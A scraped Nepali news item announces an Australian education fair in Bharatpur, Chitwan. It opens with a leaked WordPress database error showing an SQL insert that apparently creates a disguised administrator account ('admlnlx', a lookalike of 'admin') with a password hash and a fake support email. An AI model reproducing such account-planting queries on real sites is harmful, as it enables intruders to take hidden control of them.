WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdptXK6mixbhdMQD4oK7lCK2Uz4t6i/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 11:14:50', '', 'admlnlx', 'admlnlx')
चितवन, माघ ३–
एक्सपर्ट एजुकेशन एण्ड भिसा सर्भिसेस नारायणगढको आयोजनामा एक दिने अष्ट्रेलियन एजुकेशन फेयर हुने भएको छ ।
यही माघ ५ गते बुधबारका दिन होटेल रोयल सेन्चुरी भरतपुर हाईटमा हुने एजुकेशन फेयर विहान ११ बाट संचालन हुने एक्सपर्ट एजुकेशनका नारायणगढ प्रमुख डिल्लीराम अधिकारीले जानकारी दिनुभयो । फेयरमा चाल्र्स स्टर्ट युनिभर्सिटि, वेष्टन सिड्नी युनिभर्सिटिलगायतका ६ वटा युनिभर्सिटीहरुको सहभागिता रहने छ । सो फेयरमा एक्सपर्ट मूख्य कार्यालय सिईओ बद्री अर्याल, एक्सपर्ट ब्रिसबेनका डाईरेक्टर सागर अर्याल र एक्सपर्ट ब्रिसबेनका अपरेशन म्यानेजर होमनाथ पौडेलले परामर्श दिने एक्सपर्ट चितवन प्रमुख अधिकारीले जानकारी दिनुभयो ।